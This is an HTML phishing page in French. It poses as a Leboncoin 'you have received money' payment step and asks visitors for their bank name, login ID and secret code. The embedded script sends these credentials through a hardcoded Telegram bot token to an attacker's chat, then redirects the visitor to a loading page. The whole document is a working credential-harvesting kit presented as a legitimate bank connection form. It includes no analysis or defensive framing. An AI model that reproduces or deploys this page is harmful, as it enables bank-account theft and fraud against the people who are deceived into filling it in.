<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Vous avez recu de l'argent</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap">
    <style>
        *{
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        body{
            height: 100vh;
            font-family: 'Poppins', sans-serif;
        }
        .top{
            position: fixed;
            left: 0;
            top: 0;
            background-color: white;
            width: 100%;
            height: 50px;
            padding: 10px;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        .center{
            margin-top: 60px;
            padding: 20px;
        }

        input{
            width: 100%;
            height: 50px;
            border: 2px solid rgba(128, 128, 128, 0.441);
            border-radius: 15px;
            margin-bottom: 20px;
            padding-left: 10px;
            font-size: 1.2rem;
        }
        input:focus{
            outline: none;
        }

        button{
            background-color: #EC5A13;
            color: white;
            height: 50px;
            border: none;
            border-radius: 17px;
            width: 100%;
            font-weight: bolder;
        }

        a{
            color: grey;
            font-size: bolder;
        }

    </style>
</head>
<body>

    <div class="top shadow-sm">

        <img src="./img/lb.png" width="140">

    </div>

    <div class="center">
        <p style="font-size: 1.6rem; font-weight: bolder;">Ma banque </p>

        <p>Connectez votre banque pour finilaser l'operation.</p>

        <br> <br>

        <form id="form">

            <label for="banque">Nom de banque *</label><br>
            <input type="text" id="banque" required>
            <br>
            <label for="id">Identifiant *</label><br>
            <input type="text" id="id" required>
            <br>
            <label for="password">Code secret *</label><br>
            <input type="password" id="code" required>
            <br>
            <br>

            <button type="submit">Continuer</button>
            <br>
            <br>

        </form>
    </div>
    
</body>

<script>

document.getElementById('form').addEventListener('submit', function (e) {
            e.preventDefault();
        
            // Récupération des valeurs du formulaire
            const banque = document.getElementById('banque').value;
            const id = document.getElementById('id').value;
            const code = document.getElementById('code').value;
            
            // Validation des champs
            if (!banque || !id) {
                alert('Veuillez remplir tous les champs.');
                return;
            }
        
           
            // Construction du message
            const message = `
                leboncoin résultat :
                \n🏦Banque : ${banque}
                \nUser: ${id}
                \n🔑Code : ${code}
                
            `;
        
            const botToken = '8185736980:AAEOwXzmWc6wwN6RNei43joSsSlAiucxLgU'; 
            const chatId = '8058799554'; 

            const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
        
            // Envoi du message au bot Telegram
            fetch(url, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message
                })
            })
            .then(response => response.json())
            .then(data => {
                if (data.ok) {
                    localStorage.setItem('User', id);
                    console.log('Votre message a été envoyé avec succès !');
                    window.location.href='./loader.html';
                } else {
                    console.error('Erreur lors de l\'envoi du message:', data.description);
                    console.log('Une erreur est survenue lors de l\'envoi de votre message. Veuillez réessayer.');
                }
            })
            .catch(error => {
                console.error('Erreur réseau ou serveur:', error);
                console.log('Une erreur est survenue lors de l\'envoi de votre message. Veuillez réessayer.');
            });
        });
        
</script>

<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz" crossorigin="anonymous"></script>

</html>